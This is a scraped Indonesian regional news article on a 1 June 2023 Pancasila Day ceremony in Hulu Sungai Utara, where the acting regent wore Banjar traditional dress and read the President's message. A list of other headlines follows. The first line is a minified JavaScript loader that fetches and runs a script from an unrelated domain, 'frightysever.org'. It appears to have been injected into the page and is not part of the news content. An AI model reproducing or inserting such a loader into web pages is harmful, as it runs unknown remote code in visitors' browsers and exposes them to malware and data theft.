(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Ragam Etnik Banjar Warnai Peringatan Hari Lahir Pancasila di HSU


KANALKALIMANTAN.COM, AMUNTAI – Kenakan baju batik sasirangan dan laung -tutup kepala pakaian adat Banjar- bermotif kain tenun Saringading, Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Raden Suria Fadliansyah, memimpin upacara peringatan Hari Lahir Pancasila tahun 2023 yang digelar di halaman kantor Bupati HSU, Kamis (1/6/2023) pagi.

Pelaksanaan upacara peringatan Hari Lahir Pancasila menjadi istimewa, karena tak hanya Pj Bupati HSU, sejumlah pejabat dan instansi di lingkungan Pemerintah Kabupaten HSU juga mengenakan baju sasirangan ditambah laung Banjar serupa yang membuat upacara kali ini berbeda dari sebelumnya.

Hadir dalam upacara Sekda HSU Adi Lesmana, para pejabat SKPD di lingkungan Pemkab HSU beserta jajaran, unsur Forkopimda, ASN serta para pelajar dan mahasiswa.

Pj Bupati HSU Raden Suria Fadliansyah membacakan langsung teks Pancasila yang diikuti oleh seluruh peserta upacara.

Baca juga: Harga BBM Terbaru Pertamina Berubah per 1 Juni 2023, Ini Daftar Lengkapnya

Dalam amanat tertulis Presiden RI Joko Widodo dibacakan Pj Bupati HSU menyebutkan bahwa keberadaan Pancasila merupakan anugerah dari Tuhan Yang Maha Esa untuk bangsa Indonesia, Hari Lahir Pancasila tanggal 1 Juni memiliki makna bagi rakyat dan bangsa Indonesia.

Pj Bupati HSU Raden Suria Fadliansyah menjadi inspektur upacara peringatan Hari Lahir Pancasila tahun 2023 di halaman kantor Bupati HSU, Kamis (1/6/2023) pagi. Foto: diskominfohsu

“Melalui rasa cinta terhadap bangsa sendiri, kita akan mengerti betapa pentingnya menegakkan dan mengamalkan Pancasila dalam berbagai sendi kehidupan bermasyarakat, berbangsa dan bernegara. Pancasila tidak dapat digantikan dengan apapun juga baik masa dulu, sekarang dan masa yang akan datang,” katanya.

Lebih lanjut, dikatanya bahwa saat ini Indonesia telah berhasil melewati masa kritis pandemi Covid-19, hal ini membuktikan kekuatan Pancasila dan kekuatan bangsa Indonesia, ke depan akan mewujudkan Indonesia Emas 2045 dan Impian Indonesia 2085 yaitu menjadi bangsa yang memiliki sumber daya manusia yang kecerdasannya mengungguli bangsa-bangsa lain di dunia.

Menjunjung tinggi pluralisme, berbudaya, religius dan menjunjung tinggi nilai-nilai etika, menjadi pusat pendidikan, teknologi, dan peradaban dunia.

“Masyarakat dan penyelenggara negara yang bebas dari perilaku korupsi, terbangunnya infrastruktur yang merata di seluruh Indonesia, menjadi negara yang mandiri dan negara yang paling berpengaruh di Asia Pasifik dan Indonesia menjadi barometer pertumbuhan ekonomi dunia,” beber Pj Bupati HSU.

Baca juga: Peringatan Hari Lahir Pancasila di Kabupaten Banjar Berlangsung Khidmat

Sementara itu, jelang penyelenggaraan Pemilu 2024, mengajak seluruh komponen bangsa untuk Bersama-sama menyukseskan Pemilu yang jujur, aman, dan damai.

“Kita harus menjaga kerukunan dan keutuhan untuk menciptakan suasana kondusif sebagai wujud pengamalan nilai-nilai Pancasila,” tambahnya.

Pj Bupati HSU juga mengajak seluruh komponen masyarakat untuk  bersama-sama mengaktualisasikan nilai-nilai Pancasila dalam kehidupan keseharian, dan bergotong royong menurunkan angka stunting di Indonesia, hal ini merupakan kerja nyata pembumian Pancasila dan pengaktualisasian nilai-nilai luhur Pancasila.

“Semoga peringatan Hari Lahir Pancasila 1 Juni 2023 ini dapat lebih meningkatkan kinerja, membuat prestasi, membuat terobosan, dan menumbuhkan pembaharuan di tahun 2023 dan ditahun yang akan datang,” tutupnya. (Kanalkalimantan.com/dew)

Reporter: dew
Editor: bie


Al Ghifari

Recent Posts

Tugu Adipura Banjarbaru Layak Dipasang APILL, Tunggu Rekomendasi Resmi BPTD dan BPJN

KANALKALIMANTAN.COM, BANJARBARU - Ruas kawasan Tugu Adipura di Jalan Ahmad Yani Kota Banjarbaru, Kalimantan Selatan… Read More

3 jam ago

Kumpulkan Caleg Terpilih dan Pengurus DPD, PAN Kalsel ‘Panaskan Mesin’ Hadapi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Pasca pelaksanaan Pemilu 2024, Dewan Pimpinan Wilayah (DPW) Partai Amanat Nasional (PAN)… Read More

5 jam ago

Silaturahmi Camat Lurah RT RW, Paman Birin Cerita Pernah Jadi Lurah dan Sekcam

KANALKALIMANTAN.COM, BANJARMASIN - Gubernur Kalimantan Selatan (Kalsel) H Sahbirin Noor bercerita perjalanan karirnya sebelum menjadi… Read More

8 jam ago

APILL Terpasang di Samsat Banjarbaru, Dua Jalan Jadi Perempatan

DPUPR Banjarbaru akan Bongkar Median Sepanjang 35 Meter Read More

9 jam ago

Chaos Banjarmasin di Atas Kanvas, Tragedi Kelam Jumat Kelabu 23 Mei 1997

“Setiap goresan kuas di lukisan ini, saya terbayang, merasakan terbawa kedalam suasana, di saat kerusuhan… Read More

12 jam ago

Perpisahan Siswa SMAN 1 Kapuas, Erlin Hardi : Belajar, Belajar, dan Belajar!

KANALKALIMANTAN.COM, KUALA KAPUAS - Pendidikan merupakan tolak ukur kemajuan suatu bangsa. Dengan pendidikan yang baik… Read More

14 jam ago

This website uses cookies.